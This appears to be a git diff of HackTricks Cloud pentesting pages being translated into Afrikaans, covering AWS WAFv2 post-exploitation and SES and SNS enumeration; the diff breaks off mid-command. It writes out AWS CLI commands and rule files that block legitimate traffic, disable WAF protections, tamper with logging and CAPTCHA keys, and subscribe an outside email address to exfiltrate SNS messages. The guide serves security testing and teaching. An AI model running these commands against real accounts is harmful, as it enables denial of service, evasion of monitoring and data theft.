 aws wafv2 get-ip-set --name <value> --id <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
 ## Retrieve the keys that are currently being managed by a rate-based rule.
 aws wafv2 get-rate-based-statement-managed-keys --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>\
- --web-acl-name <value> --web-acl-id <value> --rule-name <value> [--rule-group-rule-name <value>]
+--web-acl-name <value> --web-acl-id <value> --rule-name <value> [--rule-group-rule-name <value>]
 
 # Regex pattern sets #
 
@@ -186,78 +185,70 @@ aws wafv2 list-mobile-sdk-releases --platform <IOS | ANDROID>
 aws wafv2 get-mobile-sdk-release --platform <value> --release-version <value>
 
 ```
-
 ### Post Exploitation / Bypass
 
 > [!TIP]
-> From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs.
+> Vanuit 'n aanvaller se perspektief kan hierdie diens die aanvaller help om WAF-beskermings en netwerkblootstellings te identifiseer wat hom kan help om ander webwerwe te kompromitteer.
 >
-> However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF.
+> egter, 'n aanvaller kan ook belangstel om hierdie diens te ontwrig sodat die webwerwe nie deur die WAF beskerm word nie.
 
-In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource.
+In baie van die Verwyder en Opdateer operasies sal dit nodig wees om die **lock token** te verskaf. Hierdie token word gebruik vir mededingingsbeheer oor die hulpbronne, wat verseker dat veranderinge nie per ongeluk deur verskeie gebruikers of prosesse wat probeer om dieselfde hulpbron gelyktydig op te dateer, oorgeskryf word nie. Om hierdie token te verkry, kan jy die ooreenstemmende **lys** of **kry** operasies oor die spesifieke hulpbron uitvoer.
 
 #### **`wafv2:CreateRuleGroup`, `wafv2:UpdateRuleGroup`, `wafv2:DeleteRuleGroup`**
 
-An attacker would be able to compromise the security of the affected resource by:
-
-- Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service.
-- Updating rule groups, being able to modify its actions for example from **Block** to **Allow**.
-- Deleting rule groups that provide critical security measures.
+'n Aanvaller sal in staat wees om die sekuriteit van die geraakte hulpbron te kompromitteer deur:
 
+- Reëlgroepe te skep wat, byvoorbeeld, wettige verkeer van wettige IP-adresse kan blokkeer, wat 'n ontkenning van diens veroorsaak.
+- Reëlgroepe op te dateer, wat in staat is om sy aksies te verander, byvoorbeeld van **Block** na **Allow**.
+- Reëlgroepe te verwyder wat kritieke sekuriteitsmaatreëls bied.
 ```bash
 # Create Rule Group
 aws wafv2 create-rule-group --name <value> --capacity <value> --visibility-config <value> \
 --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--rules <value>] [--description <value>]
 # Update Rule Group
 aws wafv2 update-rule-group --name <value> --id <value> --visibility-config <value> --lock-token <value>\
- --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--rules <value>] [--description <value>]
+--scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--rules <value>] [--description <value>]
 # Delete Rule Group
 aws wafv2 delete-rule-group --name <value> --id <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
 ```
-
-The following examples shows a rule group that would block legitimate traffic from specific IP addresses:
-
+Die volgende voorbeelde toon 'n reëlgroep wat legitieme verkeer van spesifieke IP-adresse sou blokkeer:
 ```bash
 aws wafv2 create-rule-group --name BlockLegitimateIPsRuleGroup --capacity 1 --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=BlockLegitimateIPsRuleGroup --scope CLOUDFRONT --region us-east-1 --rules file://rule.json
 ```
-
-The **rule.json** file would look like:
-
+Die **rule.json** lêer sal soos volg lyk:
 ```json
 [
-  {
-    "Name": "BlockLegitimateIPsRule",
-    "Priority": 0,
-    "Statement": {
-      "IPSetReferenceStatement": {
-        "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
-      }
-    },
-    "Action": {
-      "Block": {}
-    },
-    "VisibilityConfig": {
-      "SampledRequestsEnabled": false,
-      "CloudWatchMetricsEnabled": false,
-      "MetricName": "BlockLegitimateIPsRule"
-    }
-  }
+{
+"Name": "BlockLegitimateIPsRule",
+"Priority": 0,
+"Statement": {
+"IPSetReferenceStatement": {
+"ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+}
+},
+"Action": {
+"Block": {}
+},
+"VisibilityConfig": {
+"SampledRequestsEnabled": false,
+"CloudWatchMetricsEnabled": false,
+"MetricName": "BlockLegitimateIPsRule"
+}
+}
 ]
 ```
-
-**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks.
+**Potensiële Impak**: Ongeoorloofde toegang, datalekke, en potensiële DoS-aanvalle.
 
 #### **`wafv2:CreateWebACL`, `wafv2:UpdateWebACL`, `wafv2:DeleteWebACL`**
 
-With these permissions, an attacker would be able to:
+Met hierdie toestemmings kan 'n aanvaller:
 
-- Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service.
-- Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests.
-- Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks.
+- 'n Nuwe Web ACL skep, wat reëls bekendstel wat of kwaadwillige verkeer toelaat of legitieme verkeer blokkeer, wat die WAF effektief nutteloos maak of 'n ontkenning van diens veroorsaak.
+- Bestaande Web ACL's opdateer, wat in staat is om reëls te wysig om aanvalle soos SQL-inspuiting of kruis-webskripting toe te laat, wat voorheen geblokkeer was, of normale verkeersvloei te ontwrig deur geldige versoeke te blokkeer.
+- 'n Web ACL verwyder, wat die betrokke hulpbronne heeltemal onbeskermd laat, en dit blootstel aan 'n wye reeks webaanvalle.
 
 > [!NOTE]
-> You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false.
-
+> Jy kan slegs die gespesifiseerde **WebACL** verwyder as **ManagedByFirewallManager** vals is.
 ```bash
 # Create Web ACL
 aws wafv2 create-web-acl --name <value> --default-action <value> --visibility-config <value> \
@@ -268,119 +259,109 @@ aws wafv2 update-web-acl --name <value> --id <value> --default-action <value> --
 # Delete Web ACL
 aws wafv2 delete-web-acl --name <value> --id <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
 ```
+Die volgende voorbeelde wys hoe om 'n Web ACL op te dateer om die legitieme verkeer van 'n spesifieke IP stel te blokkeer. As die oorspronklike IP nie met enige van daardie IP's ooreenstem nie, sal die standaardaksie ook wees om dit te blokkeer, wat 'n DoS veroorsaak.
 
-The following examples shows how to update a Web ACL to block the legitimate traffic from a specific IP set. If the origin IP does not match any of those IPs, the default action would also be blocking it, causing a DoS.
-
-**Original Web ACL**:
-
+**Oorspronklike Web ACL**:
 ```json
 {
-  "WebACL": {
-    "Name": "AllowLegitimateIPsWebACL",
-    "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
-    "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
-    "DefaultAction": {
-      "Allow": {}
-    },
-    "Description": "",
-    "Rules": [
-      {
-        "Name": "AllowLegitimateIPsRule",
-        "Priority": 0,
-        "Statement": {
-          "IPSetReferenceStatement": {
-            "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
-          }
-        },
-        "Action": {
-          "Allow": {}
-        },
-        "VisibilityConfig": {
-          "SampledRequestsEnabled": false,
-          "CloudWatchMetricsEnabled": false,
-          "MetricName": "AllowLegitimateIPsRule"
-        }
-      }
-    ],
-    "VisibilityConfig": {
-      "SampledRequestsEnabled": false,
-      "CloudWatchMetricsEnabled": false,
-      "MetricName": "AllowLegitimateIPsWebACL"
-    },
-    "Capacity": 1,
-    "ManagedByFirewallManager": false,
-    "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:"
-  },
-  "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+"WebACL": {
+"Name": "AllowLegitimateIPsWebACL",
+"Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
+"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
+"DefaultAction": {
+"Allow": {}
+},
+"Description": "",
+"Rules": [
+{
+"Name": "AllowLegitimateIPsRule",
+"Priority": 0,
+"Statement": {
+"IPSetReferenceStatement": {
+"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+}
+},
+"Action": {
+"Allow": {}
+},
+"VisibilityConfig": {
+"SampledRequestsEnabled": false,
+"CloudWatchMetricsEnabled": false,
+"MetricName": "AllowLegitimateIPsRule"
+}
+}
+],
+"VisibilityConfig": {
+"SampledRequestsEnabled": false,
+"CloudWatchMetricsEnabled": false,
+"MetricName": "AllowLegitimateIPsWebACL"
+},
+"Capacity": 1,
+"ManagedByFirewallManager": false,
+"LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:"
+},
+"LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
 }
 ```
-
-Command to update the Web ACL:
-
+Opdrag om die Web ACL op te dateer:
 ```json
 aws wafv2 update-web-acl --name AllowLegitimateIPsWebACL --scope REGIONAL --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --default-action Block={} --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=AllowLegitimateIPsWebACL --rules file://rule.json --region us-east-1
 ```
-
-The **rule.json** file would look like:
-
+Die **rule.json** lêer sal soos volg lyk:
 ```json
 [
-  {
-    "Name": "BlockLegitimateIPsRule",
-    "Priority": 0,
-    "Statement": {
-      "IPSetReferenceStatement": {
-        "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
-      }
-    },
-    "Action": {
-      "Block": {}
-    },
-    "VisibilityConfig": {
-      "SampledRequestsEnabled": false,
-      "CloudWatchMetricsEnabled": false,
-      "MetricName": "BlockLegitimateIPRule"
-    }
-  }
+{
+"Name": "BlockLegitimateIPsRule",
+"Priority": 0,
+"Statement": {
+"IPSetReferenceStatement": {
+"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+}
+},
+"Action": {
+"Block": {}
+},
+"VisibilityConfig": {
+"SampledRequestsEnabled": false,
+"CloudWatchMetricsEnabled": false,
+"MetricName": "BlockLegitimateIPRule"
+}
+}
 ]
 ```
-
-**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks.
+**Potensiële Impak**: Ongeoorloofde toegang, datalekke, en potensiële DoS-aanvalle.
 
 #### **`wafv2:AssociateWebACL`, `wafv2:DisassociateWebACL`**
 
-The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate web ACLs (Access Control Lists) with resources, being able to bypass security controls, allowing unauthorized traffic to reach the application, potentially leading to exploits like SQL injection or cross-site scripting (XSS). Conversely, with the **`wafv2:DisassociateWebACL`** permission, the attacker could temporarily disable security protections, exposing the resources to vulnerabilities without detection.
+Die **`wafv2:AssociateWebACL`** toestemming sou 'n aanvaller in staat stel om web ACLs (Toegangsbeheerlisensies) met hulpbronne te assosieer, wat dit moontlik maak om sekuriteitsbeheermaatreëls te omseil, wat ongeoorloofde verkeer toelaat om die toepassing te bereik, wat potensieel kan lei tot ontploffings soos SQL-inspuiting of kruis-webscripting (XSS). Omgekeerd, met die **`wafv2:DisassociateWebACL`** toestemming, kan die aanvaller tydelik sekuriteitsbeskermings deaktiveer, wat die hulpbronne aan kwesbaarhede blootstel sonder opsporing.
 
-The additional permissions would be needed depending on the protected resource type:
-
-- **Associate**
-  - apigateway:SetWebACL
-  - apprunner:AssociateWebAcl
-  - appsync:SetWebACL
-  - cognito-idp:AssociateWebACL
-  - ec2:AssociateVerifiedAccessInstanceWebAcl
-  - elasticloadbalancing:SetWebAcl
-- **Disassociate**
-  - apigateway:SetWebACL
-  - apprunner:DisassociateWebAcl
-  - appsync:SetWebACL
-  - cognito-idp:DisassociateWebACL
-  - ec2:DisassociateVerifiedAccessInstanceWebAcl
-  - elasticloadbalancing:SetWebAcl
+Die addisionele toestemmings sou benodig word, afhangende van die beskermde hulpbron tipe:
 
+- **Assosieer**
+- apigateway:SetWebACL
+- apprunner:AssociateWebAcl
+- appsync:SetWebACL
+- cognito-idp:AssociateWebACL
+- ec2:AssociateVerifiedAccessInstanceWebAcl
+- elasticloadbalancing:SetWebAcl
+- **Dissosieer**
+- apigateway:SetWebACL
+- apprunner:DisassociateWebAcl
+- appsync:SetWebACL
+- cognito-idp:DisassociateWebACL
+- ec2:DisassociateVerifiedAccessInstanceWebAcl
+- elasticloadbalancing:SetWebAcl
 ```bash
 # Associate
 aws wafv2 associate-web-acl --web-acl-arn <value> --resource-arn <value>
 # Disassociate
 aws wafv2 disassociate-web-acl --resource-arn <value>
 ```
-
-**Potential Impact**: Compromised resources security, increased risk of exploitation, and potential service disruptions within AWS environments protected by AWS WAF.
+**Potensiële Impak**: Gecompromitteerde hulpbronne-sekuriteit, verhoogde risiko van eksploitatie, en potensiële diensonderbrekings binne AWS-omgewings wat deur AWS WAF beskerm word.
 
 #### **`wafv2:CreateIPSet` , `wafv2:UpdateIPSet`, `wafv2:DeleteIPSet`**
 
-An attacker would be able to create, update and delete the IP sets managed by AWS WAF. This could be dangerous since could create new IP sets to allow malicious traffic, modify IP sets in order to block legitimate traffic, update existing IP sets to include malicious IP addresses, remove trusted IP addresses or delete critical IP sets that are meant to protect critical resources.
-
+'n Aanvaller sou in staat wees om die IP-selle wat deur AWS WAF bestuur word, te skep, op te dateer en te verwyder. Dit kan gevaarlik wees aangesien dit nuwe IP-selle kan skep om kwaadwillige verkeer toe te laat, IP-selle kan wysig om wettige verkeer te blokkeer, bestaande IP-selle kan opdateer om kwaadwillige IP-adresse in te sluit, vertroude IP-adresse kan verwyder of kritieke IP-selle kan verwyder wat bedoel is om kritieke hulpbronne te beskerm.
 ```bash
 # Create IP set
 aws wafv2 create-ip-set --name <value> --ip-address-version <IPV4 | IPV6> --addresses <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
@@ -389,23 +370,19 @@ aws wafv2 update-ip-set --name <value> --id <value> --addresses <value> --lock-t
 # Delete IP set
 aws wafv2 delete-ip-set --name <value> --id <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
 ```
-
-The following example shows how to **overwrite the existing IP set by the desired IP set**:
-
+Die volgende voorbeeld wys hoe om **die bestaande IP stel te oorskryf met die gewenste IP stel**:
 ```bash
 aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1
 ```
-
-**Potential Impact**: Unauthorized access and block of legitimate traffic.
+**Potensiële Impak**: Ongeoorloofde toegang en blokkering van legitieme verkeer.
 
 #### **`wafv2:CreateRegexPatternSet`** , **`wafv2:UpdateRegexPatternSet`**, **`wafv2:DeleteRegexPatternSet`**
 
-An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns.
-
-- Creating new regex patterns would help an attacker to allow harmful content
-- Updating the existing patterns, an attacker would to bypass security rules
-- Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures.
+'n Aanvaller met hierdie toestemmings sou in staat wees om die gereelde uitdrukking patroonstelle wat deur AWS WAF gebruik word, te manipuleer om inkomende verkeer op grond van spesifieke patrone te beheer en te filtreer.
 
+- Die skep van nuwe regex patrone sou 'n aanvaller help om skadelike inhoud toe te laat
+- Deur die bestaande patrone op te dateer, sou 'n aanvaller die sekuriteitsreëls kon omseil
+- Die verwydering van patrone wat ontwerp is om kwaadwillige aktiwiteite te blokkeer, kan 'n aanvaller lei om kwaadwillige payloads te stuur en die sekuriteitsmaatreëls te omseil.
 ```bash
 # Create regex pattern set
 aws wafv2 create-regex-pattern-set --name <value> --regular-expression-list <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--description <value>]
@@ -414,62 +391,51 @@ aws wafv2 update-regex-pattern-set --name <value> --id <value> --regular-express
 # Delete regex pattern set
 aws wafv2 delete-regex-pattern-set --name <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> --id <value> --lock-token <value>
 ```
-
-**Potential Impact**: Bypass security controls, allowing malicious content and potentially exposing sensitive data or disrupting services and resources protected by AWS WAF.
+**Potensiële Impak**: Oorskry sekuriteitsbeheer, wat kwaadwillige inhoud toelaat en moontlik sensitiewe data blootstel of dienste en hulpbronne wat deur AWS WAF beskerm word, ontwrig.
 
 #### **(`wavf2:PutLoggingConfiguration` &** `iam:CreateServiceLinkedRole`), **`wafv2:DeleteLoggingConfiguration`**
 
-An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to remove the logging configuration from the specified Web ACL. Subsequently, with the **`wavf2:PutLoggingConfiguration`** and **`iam:CreateServiceLinkedRole`** permissions, an attacker could create or replace logging configurations (after having deleted it) to either prevent logging altogether or redirect logs to unauthorized destinations, such as Amazon S3 buckets, Amazon CloudWatch Logs log group or an Amazon Kinesis Data Firehose under control.
+'n Aanvaller met die **`wafv2:DeleteLoggingConfiguration`** sou in staat wees om die logging-konfigurasie van die gespesifiseerde Web ACL te verwyder. Vervolgens, met die **`wavf2:PutLoggingConfiguration`** en **`iam:CreateServiceLinkedRole`** toestemmings, kan 'n aanvaller logging-konfigurasies skep of vervang (nadat dit verwyder is) om of logging heeltemal te voorkom of logs na ongeoorloofde bestemmings te herlei, soos Amazon S3-buckets, Amazon CloudWatch Logs loggroep of 'n Amazon Kinesis Data Firehose onder beheer.
 
-During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination:
+Tydens die skepproses stel die diens outomaties die nodige toestemmings op om te verseker dat logs na die gespesifiseerde logging-bestemming geskryf kan word:
 
-- **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group.
-- **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket.
-- **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream.
+- **Amazon CloudWatch Logs:** AWS WAF skep 'n hulpbronbeleid op die aangewese CloudWatch Logs loggroep. Hierdie beleid verseker dat AWS WAF die toestemmings het wat nodig is om logs na die loggroep te skryf.
+- **Amazon S3 Bucket:** AWS WAF skep 'n emmerbeleid op die aangewese S3-emmer. Hierdie beleid verleen AWS WAF die nodige toestemmings om logs na die gespesifiseerde emmer op te laai.
+- **Amazon Kinesis Data Firehose:** AWS WAF skep 'n diens-gekoppelde rol spesifiek vir interaksie met Kinesis Data Firehose. Hierdie rol stel AWS WAF in staat om logs na die geconfigureerde Firehose-stroom te lewer.
 
 > [!NOTE]
-> It is possible to define only one logging destination per web ACL.
-
+> Dit is moontlik om slegs een logging-bestemming per web ACL te definieer.
 ```bash
 # Put logging configuration
 aws wafv2 put-logging-configuration --logging-configuration <value>
 # Delete logging configuration
 aws wafv2 delete-logging-configuration --resource-arn <value> [--log-scope <CUSTOMER | SECURITY_LAKE>] [--log-type <value>]
 ```
-
-**Potential Impact:** Obscure visibility into security events, difficult the incident response process, and facilitate covert malicious activities within AWS WAF-protected environments.
+**Potensiële Impak:** Obskureer sigbaarheid in sekuriteitsevents, moeilikheid in die insidentresponsproses, en fasiliteer oorgenoemde kwaadwillige aktiwiteite binne AWS WAF-beskermde omgewings.
 
 #### **`wafv2:DeleteAPIKey`**
 
-An attacker with this permissions would be able to delete existing API keys, rendering the CAPTCHA ineffective and disrupting the functionality that relies on it, such as form submissions and access controls. Depending on the implementation of this CAPTCHA, this could lead either to a CAPTCHA bypass or to a DoS if the error management is not properly set in the resource.
-
+'n Aanvaller met hierdie toestemmings sou in staat wees om bestaande API-sleutels te verwyder, wat die CAPTCHA ondoeltreffend maak en die funksionaliteit wat daarop staatmaak, soos vormindienings en toegangbeheer, ontwrig. Afhangende van die implementering van hierdie CAPTCHA, kan dit lei tot 'n CAPTCHA-omseiling of 'n DoS as die foutbestuur nie behoorlik in die hulpbron ingestel is nie.
 ```bash
 # Delete API key
 aws wafv2 delete-api-key --api-key <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
 ```
-
-**Potential Impact**: Disable CAPTCHA protections or disrupt application functionality, leading to security breaches and potential data theft.
+**Potensiële Impak**: Deaktiveer CAPTCHA beskermings of onderbreek toepassingsfunksionaliteit, wat lei tot sekuriteitsbreuke en potensiële datadiefstal.
 
 #### **`wafv2:TagResource`, `wafv2:UntagResource`**
 
-An attacker would be able to add, modify, or remove tags from AWS WAFv2 resources, such as Web ACLs, rule groups, IP sets, regex pattern sets, and logging configurations.
-
+'n Aanvaller sal in staat wees om etikette by te voeg, te wysig of te verwyder van AWS WAFv2 hulpbronne, soos Web ACLs, reëlgroepe, IP stelle, regex patroon stelle, en registrasie konfigurasies.
 ```bash
 # Tag
 aws wafv2 tag-resource --resource-arn <value> --tags <value>
 # Untag
 aws wafv2 untag-resource --resource-arn <value> --tag-keys <value>
 ```
+**Potensiële Impak**: Hulpbron manipulasie, inligting lekkasie, koste manipulasie en operasionele onderbreking.
 
-**Potential Impact**: Resource tampering, information leakage, cost manipulation and operational disruption.
-
-## References
+## Verwysings
 
 - [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/)
 - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md
index bc6af90f1..2fa1895de 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md
@@ -2,45 +2,40 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-Amazon Simple Email Service (Amazon SES) is designed for **sending and receiving emails**. It enables users to send transactional, marketing, or notification emails efficiently and securely at scale. It **integrates well with other AWS services**, providing a robust solution for managing email communications for businesses of all sizes.
+Amazon Simple Email Service (Amazon SES) is ontwerp om **e-posse te stuur en te ontvang**. Dit stel gebruikers in staat om transaksie-, bemarking- of kennisgewingse-posse doeltreffend en veilig op groot skaal te stuur. Dit **integreer goed met ander AWS-dienste**, wat 'n robuuste oplossing bied vir die bestuur van e-poskommunikasie vir besighede van alle groottes.
 
-You need to register **identities**, which can be domains or emails addresses that will be able to interact with SES (e.g. send and receive emails).
+Jy moet **identiteite** registreer, wat domeine of e-posadresse kan wees wat met SES kan interaksie hê (bv. e-posse stuur en ontvang).
 
-### SMTP User
-
-It's possible to connect to a **SMTP server of AWS to perform actions** instead of using the AWS API (or in addition). For this you need to create a user with a policy such as:
+### SMTP Gebruiker
 
+Dit is moontlik om te verbind met 'n **SMTP-bediener van AWS om aksies uit te voer** in plaas van om die AWS API te gebruik (of daarby). Hiervoor moet jy 'n gebruiker skep met 'n beleid soos:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Action": "ses:SendRawEmail",
-      "Resource": "*"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": "ses:SendRawEmail",
+"Resource": "*"
+}
+]
 }
 ```
-
-Then, gather the **API key and secret** of the user and run:
-
+Dan, versamel die **API-sleutel en geheim** van die gebruiker en voer uit:
 ```bash
 git clone https://github.com/lisenet/ses-smtp-converter.git
 cd ./ses-smtp-converter
 chmod u+x ./ses-smtp-conv.sh
 ./ses-smtp-conv.sh <AccessKeyId> <SecretAccessKey>
 ```
+Dit is ook moontlik om dit vanaf die AWS-konsolweb te doen.
 
-It's also possible to do this from the AWS console web.
-
-### Enumeration
+### Enumerasie
 
 > [!WARNING]
-> Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two.
-
+> Let daarop dat SES 2 API's het: **`ses`** en **`sesv2`**. Sommige aksies is in albei API's en ander is net in een van die twee.
 ```bash
 # Get info about the SES account
 aws sesv2 get-account
@@ -117,7 +112,6 @@ aws ses get-send-quota
 ## Get statistics
 aws ses get-send-statistics
 ```
-
 ### Post Exploitation
 
 {{#ref}}
@@ -125,7 +119,3 @@ aws ses get-send-statistics
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
index cca4353cb..e6aae027c 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
@@ -4,18 +4,17 @@
 
 ## SNS
 
-Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types.
+Amazon Simple Notification Service (Amazon SNS) word beskryf as 'n **volledig bestuurde boodskapdiens**. Dit ondersteun beide **toepassing-naar-toepassing** (A2A) en **toepassing-naar-persoon** (A2P) kommunikasietipes.
 
-Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern.
+Belangrike kenmerke vir A2A kommunikasie sluit **publiseer/teken (pub/sub) meganismes** in. Hierdie meganismes stel **onderwerpe** in, wat noodsaaklik is om hoë-deurset, **druk-gebaseerde, baie-naar-baie boodskappe** te fasiliteer. Hierdie kenmerk is baie voordelig in scenario's wat verspreide stelsels, mikrodiens, en gebeurtenis-gedrewe serverless argitektuur insluit. Deur hierdie onderwerpe te benut, kan publiseer stelsels boodskappe doeltreffend versprei na 'n **wye reeks van tekenaarstelsels**, wat 'n fanout boodskappatroon fasiliteer.
 
-### **Difference with SQS**
+### **Verskil met SQS**
 
-**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\
-On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\
-While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns.
-
-### **Enumeration**
+**SQS** is 'n **ry-gebaseerde** diens wat punt-tot-punt kommunikasie toelaat, wat verseker dat boodskappe verwerk word deur 'n **enkele verbruiker**. Dit bied **ten minste-eens aflewering**, ondersteun standaard en FIFO rye, en laat boodskapbehoud toe vir herhalings en vertraagde verwerking.\
+Aan die ander kant is **SNS** 'n **publiseer/teken-gebaseerde diens**, wat **een-naar-baie** kommunikasie moontlik maak deur boodskappe gelyktydig na **meerdere tekenaars** te versprei. Dit ondersteun **verskeie tekenaars eindpunte soos e-pos, SMS, Lambda funksies, en HTTP/HTTPS**, en bied filtrasie meganismes vir geteikende boodskapaflewering.\
+Terwyl albei dienste ontkoppeling tussen komponente in verspreide stelsels moontlik maak, fokus SQS op gequeue kommunikasie, en beklemtoon SNS gebeurtenis-gedrewe, fan-out kommunikasiepatrone.
 
+### **Enumerasie**
 ```bash
 # Get topics & subscriptions
 aws sns list-topics
@@ -24,29 +23,28 @@ aws sns list-subscriptions-by-topic --topic-arn <arn>
 
 # Check privescs & post-exploitation
 aws sns publish --region <region> \
-    --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
-    --message file://message.txt
+--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
+--message file://message.txt
 
 # Exfiltrate through email
 ## You will receive an email to confirm the subscription
 aws sns subscribe --region <region> \
-    --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
-    --protocol email \
-    --notification-endpoint my-email@example.com
+--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
